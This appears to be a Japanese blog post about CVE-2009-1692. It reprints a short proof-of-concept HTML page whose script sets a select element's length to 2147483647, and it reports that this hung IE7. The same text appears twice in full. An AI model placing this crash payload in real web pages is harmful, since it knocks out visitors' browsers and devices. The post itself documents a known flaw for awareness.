以下の記事を見つけました。場所は、マイコミジャーナルからです。
[サイトの文頭は以下になります]
SecurityFocusは15日(カナダ時間)、IE、Chrome、Safari、Opera、Thunderbird、iPhone、Wii、PS3など広範囲に渡ってブラウザ、OS、デバイスに共通の問題があり、ブラウザの終了、OSの再起動、ハードウェアのハングアップなどの不具合が発生することを発表した(CVE-2009-1692)。・・・
詳細は、上記のサイトに記述があるので、早速、SecurityFocus ここへ行き、ソースを確認し、以下の内容について、IE7で試しました。スクリプト部分は、サイトにあったものをコピー。ボタンで動作するようにする。以下は、タグを全角で表示しています。
-----------------------
<html>
<head><title>暴走</title>
<script>
function poc(o) {
e = document.createElement("select");
e.length=2147483647;
}
function go() {
alert("暴走しますよ。"); ←確認のため。
poc(0);
}
</script>
</head>
<body>
<input type=button name="test" value="テスト" onclick="go()">
</body>
</html>
------------------------------------------
実際にボタンを押すと、IE7のCPUが70%を越え、ハングアップしました。
タスクマネージャから強制終了しました。
実行する場合は、自己責任で行いましょう。タグで開かず、新しいブラウザを開いて実行しましょう。
アプリケーションには、このような脆弱性があることを、ぜひ知ってもらいたいですね。
メモメモ
[サイトの文頭は以下になります]
SecurityFocusは15日(カナダ時間)、IE、Chrome、Safari、Opera、Thunderbird、iPhone、Wii、PS3など広範囲に渡ってブラウザ、OS、デバイスに共通の問題があり、ブラウザの終了、OSの再起動、ハードウェアのハングアップなどの不具合が発生することを発表した(CVE-2009-1692)。・・・
詳細は、上記のサイトに記述があるので、早速、SecurityFocus ここへ行き、ソースを確認し、以下の内容について、IE7で試しました。スクリプト部分は、サイトにあったものをコピー。ボタンで動作するようにする。以下は、タグを全角で表示しています。
-----------------------
<html>
<head><title>暴走</title>
<script>
function poc(o) {
e = document.createElement("select");
e.length=2147483647;
}
function go() {
alert("暴走しますよ。"); ←確認のため。
poc(0);
}
</script>
</head>
<body>
<input type=button name="test" value="テスト" onclick="go()">
</body>
</html>
------------------------------------------
実際にボタンを押すと、IE7のCPUが70%を越え、ハングアップしました。
タスクマネージャから強制終了しました。
実行する場合は、自己責任で行いましょう。タグで開かず、新しいブラウザを開いて実行しましょう。
アプリケーションには、このような脆弱性があることを、ぜひ知ってもらいたいですね。
メモメモ